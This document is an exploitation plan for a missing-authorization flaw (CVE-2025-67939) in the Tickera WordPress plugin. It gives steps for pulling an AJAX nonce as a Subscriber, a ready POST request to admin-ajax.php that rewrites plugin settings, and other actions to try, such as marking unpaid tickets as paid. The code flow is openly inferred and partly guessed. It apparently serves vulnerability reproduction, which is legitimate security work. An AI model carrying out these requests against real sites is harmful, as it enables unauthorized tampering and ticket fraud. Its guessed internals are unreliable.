Tickera <= 3.5.6.2 - Missing Authorization

This plan outlines the research and exploitation process for CVE-2025-67939, a Missing Authorization vulnerability in the Tickera plugin.

1. Vulnerability Summary

The Tickera plugin for WordPress (versions <= 3.5.6.2) fails to implement proper capability checks (authorization) on certain AJAX handlers registered via wp_ajax_*. While these handlers may implement a nonce check for CSRF protection, they do not verify if the authenticated user has the necessary permissions (e.g., manage_options) to perform the action. Consequently, any authenticated user, including those with Subscriber roles, can execute these functions.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: tc_save_settings (or a similar administrative AJAX action, to be confirmed in Step 3).
• Payload Parameter: security (the nonce) and the data to be modified (e.g., tc_general_setting).
• Authentication: Subscriber-level credentials.
• Preconditions: The plugin must be active, and a valid nonce must be obtained.

3. Code Flow (Inferred from Patch and Architecture)

Based on Tickera's typical architecture and the nature of the patch:

1. Registration: The plugin registers AJAX hooks in a class constructor or an initialization file (likely includes/classes/class.ajax.php or tickera.php).
   • Code: add_action( 'wp_ajax_tc_save_settings', array( $this, 'save_settings' ) );
2. Entry Point: When a Subscriber sends a POST request to admin-ajax.php with action=tc_save_settings.
3. Vulnerable Function: The handler function (e.g., save_settings) is invoked.
4. Incomplete Check: The function calls check_ajax_referer( 'tc-ajax-nonce', 'security' ). This passes if the user is authenticated (even as a Subscriber) because the nonce is often leaked or available to all logged-in users.
5. Missing Auth: The function omits a call to current_user_can( 'manage_options' ).
6. Sink: The function processes input and updates options: update_option( 'tc_general_setting', $_POST['tc_general_setting'] );.

4. Nonce Acquisition Strategy

Tickera typically localizes its AJAX settings into a global JavaScript object named tc_ajax. This object is frequently available to any logged-in user if Tickera components are loaded.

1. Identify Trigger: The tc_ajax object is usually enqueued via the tc-scripts handle.
2. Create Setup Page: If the scripts aren't visible on the homepage, create a page containing a Tickera shortcode.
   • wp post create --post_type=page --post_status=publish --post_content='[tc_event]' (or any valid Tickera shortcode like [tc_ticket_form]).
3. Navigate and Extract: Use the browser to access this page as a Subscriber and extract the nonce.
   • JS Variable: window.tc_ajax?.nonce (or window.tc_ajax_vars?.nonce).
   • Nonce Action: tc-ajax-nonce.

5. Exploitation Strategy

The goal is to modify the plugin's settings as a Subscriber.

Step 1: Obtain Subscriber Cookies
Authenticate as a Subscriber and capture the session cookies.

Step 2: Extract Nonce

1. Navigate to the page created in the setup phase.
2. Execute browser_eval("tc_ajax.nonce") to get the security token.

Step 3: Trigger Unauthorized Action
Perform an HTTP POST request to modify plugin settings (e.g., changing the "Success Page" to a malicious external URL or altering general settings).

• URL: http://TARGET/wp-admin/admin-ajax.php
• Method: POST
• Content-Type: application/x-www-form-urlencoded
• Body:

  action=tc_save_settings&security=[EXTRACTED_NONCE]&tc_general_setting[registration_page_id]=9999&tc_general_setting[event_slug]=pwned-event
  

6. Test Data Setup

1. Install Plugin: Tickera version 3.5.6.2.
2. Create User:
   • wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
3. Identify Settings: Use wp option get tc_general_setting to see current settings before exploitation.
4. Create Nonce Page:
   • wp post create --post_type=page --post_status=publish --post_title='Events' --post_content='[tc_event]'

7. Expected Results

• The admin-ajax.php response should be 1 or a JSON success message (Tickera usually returns 1 for successful AJAX processing).
• The plugin settings in the database are modified despite the request coming from a Subscriber.

8. Verification Steps

After sending the exploit request, verify the change using WP-CLI:

1. wp option get tc_general_setting
2. Check if the registration_page_id or event_slug matches the payload value (9999 or pwned-event).
3. Confirm the attacker user is still only a Subscriber: wp user get attacker --field=roles.

9. Alternative Approaches

If tc_save_settings is not the specific vulnerable function, look for other administrative functions registered in includes/classes/class.ajax.php that lack capability checks. Potential candidates include:

• tc_update_attendee_info_ajax (Modify attendee data)
• tc_mark_as_paid_ajax (Mark unpaid tickets as paid)
• tc_bulk_check_in_ajax (Manipulate event check-ins)

All these actions should be restricted to administrators or event managers but are likely accessible to Subscribers in the affected versions. To test these, use the same nonce extraction method but change the action parameter and its corresponding data payload.